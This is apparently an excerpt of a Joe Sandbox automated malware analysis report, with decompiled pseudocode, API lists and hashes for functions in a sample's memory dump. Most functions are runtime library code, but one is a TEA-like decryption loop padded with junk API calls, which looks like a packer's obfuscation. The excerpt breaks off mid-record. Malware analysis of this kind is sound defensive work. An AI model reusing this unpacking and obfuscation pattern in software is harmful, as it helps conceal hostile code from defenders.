				intOrPtr _t32;
				void* _t40;
				intOrPtr _t46;
				void* _t47;

				_t35 = __ebx;
				_push(0xc);
				_push(0x40fe60);
				E0040487C(__ebx, __edi, __esi);
				_t45 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E00403B20(_t45);
				}
				 *(_t47 - 0x1c) = _t23;
				_t46 =  *((intOrPtr*)(_t47 + 8));
				 *((intOrPtr*)(_t46 + 0x5c)) = 0x401868;
				 *((intOrPtr*)(_t46 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t46 + 0x70)) = 1;
				 *((char*)(_t46 + 0xc8)) = 0x43;
				 *((char*)(_t46 + 0x14b)) = 0x43;
				 *(_t46 + 0x68) = 0x4118a8;
				E00406842(_t35, _t40, 1, 0xd);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				InterlockedIncrement( *(_t46 + 0x68));
				 *(_t47 - 4) = 0xfffffffe;
				E00406365();
				E00406842(_t35, _t40, 1, 0xc);
				 *(_t47 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t47 + 0xc));
				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x411eb0; // 0x411dd8
					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
				}
				E00408D2A( *((intOrPtr*)(_t46 + 0x6c)));
				 *(_t47 - 4) = 0xfffffffe;
				return E004048C1(E0040636E());
			}

0x00406290
0x00406290
0x00406292
0x00406297
0x0040629c
0x004062a2
0x004062aa
0x004062ad
0x004062b2
0x004062b3
0x004062b6
0x004062b9
0x004062c3
0x004062c8
0x004062d0
0x004062d8
0x004062e8
0x004062e8
0x004062ee
0x004062f1
0x004062f8
0x004062ff
0x00406308
0x0040630e
0x00406315
0x0040631b
0x00406322
0x00406329
0x0040632f
0x00406332
0x00406335
0x0040633a
0x0040633c
0x00406341
0x00406341
0x00406347
0x0040634d
0x0040635e

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0040FE60,0000000C,004063CB,00000000,00000000,?,004075F1,?), ref: 004062A2
__crt_waiting_on_module_handle.LIBCMT ref: 004062AD

Part of subcall function 00403B20: Sleep.KERNEL32(000003E8,00000000,?,004061F3,KERNEL32.DLL,?,0040623F,?,004075F1,?), ref: 00403B2C
Part of subcall function 00403B20: GetModuleHandleW.KERNEL32(?,?,004061F3,KERNEL32.DLL,?,0040623F,?,004075F1,?), ref: 00403B35

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004062D6
GetProcAddress.KERNEL32(?,DecodePointer), ref: 004062E6
__lock.LIBCMT ref: 00406308
InterlockedIncrement.KERNEL32(004118A8), ref: 00406315
__lock.LIBCMT ref: 00406329
___addlocaleref.LIBCMT ref: 00406347

Strings

KERNEL32.DLL, xrefs: 0040629C, 004062A1, 004062AC
EncodePointer, xrefs: 004062CA
DecodePointer, xrefs: 004062DE

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 7daa365c4f1f3c6f5620963537f9db8d2fb6a0a2d92353cab0785856933f005d
Instruction ID: c5f7f4d4a171d92e4fd546218ba084379517a2aa08b604ccda2bde3c11c0c46e
Opcode Fuzzy Hash: 7daa365c4f1f3c6f5620963537f9db8d2fb6a0a2d92353cab0785856933f005d
Instruction Fuzzy Hash: 4A1160719047059AD720AF7AD845B4ABBE4EF04314F10857FE99AB36E1CB789A40CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 004026CF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E004026CF(unsigned int* __edi, void* __eflags) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				long _v56;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t75;
				unsigned int _t95;
				unsigned int* _t104;
				unsigned int _t105;

				_t104 = __edi;
				_v16 =  *__edi;
				_t66 =  *0x412548; // 0x5f8ef9d
				_v48 = _t66;
				_t67 =  *0x41254c; // 0xbe1c42ae
				_t105 = __edi[1];
				_v52 = _t67;
				_v32 = 0;
				E004026C5( &_v32);
				_t70 =  *0x412550; // 0xf9fc55c0
				_v32 = _v32 + 0x23f;
				_v40 = _t70;
				_t71 =  *0x412554; // 0xc14a7208
				_v44 = _t71;
				_v36 = 0x20;
				do {
					_v24 = 2;
					_v24 = _v24 + 3;
					_v8 = (_v16 << 4) + _v40;
					_t75 =  *0x42e384;
					if(_t75 == 0xfa9) {
						 *0x42e1e4 = 0xedeb2e40;
					}
					if(_t75 == 0x3eb) {
						InterlockedExchange( &_v56, 0);
						 *0x42e144 = 0;
					}
					_v20 = _v16;
					_v20 = _v20 + _v32;
					_v12 = _v16 >> 5;
					 *0x42e1e0 = 0xf4ea3dee;
					E004026CC( &_v12, _v44);
					_v8 = _v8 ^ _v20;
					if( *0x42e384 == 0x9e6) {
						GetTickCount();
					}
					_v12 = _v12 ^ _v8;
					if( *0x42e384 == 0x213) {
						OpenFileMappingW(0, 0, 0);
						__imp__DeleteVolumeMountPointA(0);
					}
					_t105 = _t105 - _v12;
					_v28 = 2;
					_v28 = _v28 - 0x5396dd36;
					_v28 = _v28 + 0x5396dd38;
					_v8 = _t105 << _v28;
					_v8 = _v8 + _v48;
					_v20 = _v32 + _t105;
					_v12 = (_t105 >> _v24) + _v52;
					_v8 = _v8 ^ _v20;
					_v8 = _v8 ^ _v12;
					 *0x42d0e4 = 0;
					_v16 = _v16 - _v8;
					_v32 = _v32 + 0x61c88647;
					_t61 =  &_v36;
					 *_t61 = _v36 - 1;
				} while ( *_t61 != 0);
				_t95 = _v16;
				_t104[1] = _t105;
				 *_t104 = _t95;
				return _t95;
			}

0x004026cf
0x004026d7
0x004026da
0x004026df
0x004026e2
0x004026e9
0x004026ee
0x004026f4
0x004026f7
0x004026fc
0x00402701
0x00402708
0x0040270b
0x00402710
0x00402713
0x0040271a
0x0040271a
0x00402721
0x0040272e
0x00402731
0x0040273b
0x0040273d
0x0040273d
0x0040274c
0x00402753
0x00402759
0x00402759
0x00402762
0x00402768
0x00402771
0x0040277a
0x00402784
0x0040278c
0x00402799
0x0040279b
0x0040279b
0x004027a4
0x004027b1
0x004027b6
0x004027bd
0x004027bd
0x004027c3
0x004027c6
0x004027cd
0x004027d4
0x004027e2
0x004027e8
0x004027f3
0x004027fd
0x00402803
0x00402809
0x0040280c
0x00402815
0x00402818
0x0040281f
0x0040281f
0x0040281f
0x00402828
0x0040282b
0x0040282f
0x00402833

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 00402753
GetTickCount.KERNEL32 ref: 0040279B
OpenFileMappingW.KERNEL32(00000000,00000000,00000000), ref: 004027B6
DeleteVolumeMountPointA.KERNEL32 ref: 004027BD

Strings

, xrefs: 00402713

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: CountDeleteExchangeFileInterlockedMappingMountOpenPointTickVolume
String ID:
API String ID: 4198633837-3916222277
Opcode ID: f1baafe37fb114b34cf2db6e8d7d216c982362aab3838881553a7f2aa427828d
Instruction ID: 32a452b67ac6fd04f6c0b9076d9007fd3c0f175497edcd9ca651c8aa7d5f17a7
Opcode Fuzzy Hash: f1baafe37fb114b34cf2db6e8d7d216c982362aab3838881553a7f2aa427828d
Instruction Fuzzy Hash: E241AEB1E01219EFCB40DFA9DA89A9EBBF4FB08314F50846AE415F3250D378AA45CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00408724 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00408724(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x40ffd8);
				E0040487C(__ebx, __edi, __esi);
				_t31 = E004063F0(__ebx, _t35);
				_t15 =  *0x411dcc; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00406842(_t25, _t29, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x411cd0; // 0x5d1860
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x4118a8;
								if(__eflags != 0) {
									_push(_t33);
									E004081A8(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x411cd0; // 0x5d1860
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x411cd0; // 0x5d1860
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E004087BF();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00403B50(0x20);
				}
				return E004048C1(_t33);
			}

0x00408724
0x00408724
0x00408724
0x00408724
0x00408726
0x0040872b
0x00408735
0x00408737
0x0040873f
0x00408760
0x00408766
0x0040876a
0x0040876d
0x00408770
0x00408776
0x00408778
0x0040877a
0x0040877d
0x00408783
0x00408785
0x00408787
0x0040878d
0x0040878f
0x00408790
0x00408795
0x0040878d
0x00408785
0x00408796
0x0040879b
0x0040879e
0x004087a4
0x004087a8
0x004087a8
0x004087ae
0x004087b5
0x00408747
0x00408747
0x00408747
0x0040874c
0x00408750
0x00408755
0x0040875d

APIs

__getptd.LIBCMT ref: 00408730

Part of subcall function 004063F0: __getptd_noexit.LIBCMT ref: 004063F3
Part of subcall function 004063F0: __amsg_exit.LIBCMT ref: 00406400

__amsg_exit.LIBCMT ref: 00408750
__lock.LIBCMT ref: 00408760
InterlockedDecrement.KERNEL32(?), ref: 0040877D
InterlockedIncrement.KERNEL32(005D1860), ref: 004087A8

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 71ae38c397efa0934501c7a6d8e97c1f7f49a7ad680cb9b166df224390bfadfa
Instruction ID: 3afbc463ed8f73c63c96e670660ec91d28aa376d58571e4cd45f615bcc75b0f2
Opcode Fuzzy Hash: 71ae38c397efa0934501c7a6d8e97c1f7f49a7ad680cb9b166df224390bfadfa
Instruction Fuzzy Hash: A2018B329406119BCB20BB2A9E4578A7360BB00794F20813FE984776E5CF3CA941CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 004081A8 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E004081A8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0x40ff70);
				_t8 = E0040487C(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E004048C1(_t8);
				}
				if( *0x42e3b0 != 3) {
					_push(_t24);
					L7:
					if(HeapFree( *0x42cc54, 0, ??) == 0) {
						_t10 = E00404382();
						 *_t10 = E00404340(GetLastError());
					}
					goto L9;
				}
				E00406842(__ebx, __edx, __edi, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E00407605(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E00407635();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E004081FE();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}

0x004081a8
0x004081aa
0x004081af
0x004081b4
0x004081b9
0x00408230
0x00408235
0x00408235
0x004081c2
0x00408207
0x00408208
0x00408218
0x0040821a
0x0040822d
0x0040822f
0x00000000
0x00408218
0x004081c6
0x004081cc
0x004081d1
0x004081d7
0x004081dc
0x004081de
0x004081df
0x004081e0
0x004081e6
0x004081e7
0x004081ee
0x004081f7
0x00000000
0x004081f9
0x004081f9
0x00000000
0x004081f9

APIs

__lock.LIBCMT ref: 004081C6

Part of subcall function 00406842: __mtinitlocknum.LIBCMT ref: 00406858
Part of subcall function 00406842: __amsg_exit.LIBCMT ref: 00406864
Part of subcall function 00406842: EnterCriticalSection.KERNEL32(?,?,?,0040444C,00000004,0040FE20,0000000C,00408124,?,?,00000000,00000000,00000000,?,004063A2,00000001), ref: 0040686C

___sbh_find_block.LIBCMT ref: 004081D1
___sbh_free_block.LIBCMT ref: 004081E0
HeapFree.KERNEL32(00000000,?,0040FF70,0000000C,00406823,00000000,0040FEB0,0000000C,0040685D,?,?,?,0040444C,00000004,0040FE20,0000000C), ref: 00408210
GetLastError.KERNEL32(?,0040444C,00000004,0040FE20,0000000C,00408124,?,?,00000000,00000000,00000000,?,004063A2,00000001,00000214), ref: 00408221

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 7a126fb7e77c07508bd506e97cbe44db53b9e5c242550ccc81087664f5ad3045
Instruction ID: 507807e596971028d1e4889de8fb89a06dd67e1d82edd46d0edb05ec1324151a
Opcode Fuzzy Hash: 7a126fb7e77c07508bd506e97cbe44db53b9e5c242550ccc81087664f5ad3045
Instruction Fuzzy Hash: E101D671905B01AADB207BB29D06B5F3B64AF00368F10457FF5857A1D2CF3C95418AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00409E57 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00409E57() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x4019f8;
					_v28 =  *0x4019f0;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00409e5c
0x00409e64
0x00409e7b
0x00409e27
0x00409e30
0x00409e3c
0x00409e3f
0x00409e42
0x00409e44
0x00409e47
0x00409e4c
0x00409e56
0x00409e4e
0x00409e52
0x00409e52
0x00409e66
0x00409e6c
0x00409e74
0x00000000
0x00409e76
0x00409e76
0x00409e7a
0x00409e7a
0x00409e74

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00404ADC), ref: 00409E5C
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00409E6C

Strings

KERNEL32, xrefs: 00409E57
IsProcessorFeaturePresent, xrefs: 00409E66

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: a592ca076a3aea64c9ee387a4fddd7a4033359cafd30385b84a4aba461cebe9d
Instruction ID: e51290182a2e1e9a96986d294ad1c7ef0f1965be230ab9cad6a7acab8c16fd01
Opcode Fuzzy Hash: a592ca076a3aea64c9ee387a4fddd7a4033359cafd30385b84a4aba461cebe9d
Instruction Fuzzy Hash: B2F0367064050EE2DF005BB1FD1976F7A74BB80785F5505B1E1D2B00D9DF348871D68A

Uniqueness

Uniqueness Score: -1.00%

Function 00408F9B Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408F9B(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E00404698( &_v20, _a16);
						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
							if(E004090CC( *_t72 & 0x000000ff,  &_v20) == 0) {
								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
									L10:
									if(_v8 != 0) {
										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									}
									return 1;
								}
								L21:
								_t54 = E00404382();
								 *_t54 = 0x2a;
								if(_v8 != 0) {
									_t54 = _v12;
									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							if(_t65 <= 1 || _a12 < _t65) {
								L17:
								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
								_t56 = _v20;
								if(_t58 != 0) {
									L19:
									_t57 =  *(_t56 + 0xac);
									if(_v8 == 0) {
										return _t57;
									}
									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									return _t57;
								}
								goto L17;
							}
						}
						_t59 = _a4;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x00408fa5
0x00408fac
0x00408fc3
0x00000000
0x00408fb3
0x00408fb5
0x00408fcf
0x00408fda
0x0040900c
0x004090aa
0x00408fea
0x00408fed
0x00408ff2
0x00408ff2
0x00000000
0x00408ff8
0x0040906c
0x0040906c
0x00409071
0x0040907a
0x0040907c
0x0040907f
0x0040907f
0x00000000
0x00409083
0x0040900e
0x00409011
0x0040901a
0x00409041
0x0040904a
0x00000000
0x00000000
0x00000000
0x00000000
0x00409021
0x00409034
0x0040903c
0x0040903f
0x00409051
0x00409051
0x0040905a
0x00408fc8
0x00408fc8
0x00409063
0x00000000
0x00409063
0x00000000
0x0040903f
0x0040901a
0x00408fdc
0x00408fe1
0x00408fe7
0x00408fe7
0x00000000
0x00408fb7
0x00408fb7
0x00408fbc
0x00408fc0
0x00408fc0
0x00000000
0x00408fbc
0x00408fb5

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00408FCF
__isleadbyte_l.LIBCMT ref: 00409003
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00409034
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 004090A2

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: e425fc12a51c5a5de07dbfe9a4c054cba0ea8bc6ba5236abac099db2dbbd81cf
Instruction ID: a72e1e6b92dd8046c8415602afada28cf0afd50c9d618631ceac23c624d3e928
Opcode Fuzzy Hash: e425fc12a51c5a5de07dbfe9a4c054cba0ea8bc6ba5236abac099db2dbbd81cf
Instruction Fuzzy Hash: A831AE31A10256EFDB20DF74C9809AB7BA6BF01310B15857EE5A1AB2D2DB34DD80DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409D43 Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00409D43(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00409634(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00409724(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00409C49(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00409B8E(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00409d48
0x00409d4e
0x00409dc1
0x00000000
0x00409d55
0x00409d55
0x00409d58
0x00409d73
0x00409d76
0x00409d96
0x00409da8
0x00409d78
0x00409d78
0x00409d7b
0x00000000
0x00409d7d
0x00409d8f
0x00409d8f
0x00409d7b
0x00409dc6
0x00409dca
0x00409d5a
0x00409d72
0x00409d72
0x00409d58

APIs

__cftof_l.LIBCMT ref: 00409D69

Part of subcall function 00409B8E: __fltout2.LIBCMT ref: 00409BBA

__cftog_l.LIBCMT ref: 00409D8F
__cftoe_l.LIBCMT ref: 00409DC1

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 7aaf76d984b8bee9c108c0065b9737c736a60a61fa3666d8c25626394b4aeabb
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: D511833244014EBBCF125F85DC41CEE3F62BF59394F588426FA1869172C63BC972AB85

Uniqueness

Uniqueness Score: -1.00%

Function 00402834 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402834() {
				long _v8;
				char _v1032;
				void* __edi;
				unsigned int _t4;
				unsigned int _t12;
				unsigned int* _t14;
				unsigned int* _t16;

				_t14 =  *0x42e148;
				_t4 =  *0x42e384 >> 3;
				if(_t4 > 0) {
					_t16 = _t14;
					_t12 = _t4;
					do {
						_t24 =  *0x42e384 - 0x959;
						if( *0x42e384 == 0x959) {
							GetProcessWorkingSetSize(0, 0, 0);
							WriteConsoleW(0, 0, 0,  &_v8, 0);
							LCMapStringA(0, 0, 0, 0,  &_v1032, 0);
							DebugActiveProcess(0);
						}
						_t4 = E004026CF(_t16, _t24);
						_t16 = _t16 + 8;
						_t12 = _t12 - 1;
					} while (_t12 != 0);
				}
				return _t4;
			}

0x0040283c
0x00402849
0x00402850
0x00402854
0x00402856
0x00402858
0x00402858
0x00402862
0x00402867
0x00402875
0x00402887
0x0040288e
0x0040288e
0x00402894
0x00402899
0x0040289c
0x0040289c
0x004028a0
0x004028a3

APIs

GetProcessWorkingSetSize.KERNEL32(00000000,00000000,00000000), ref: 00402867
WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402875
LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00402887
DebugActiveProcess.KERNEL32(00000000), ref: 0040288E

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

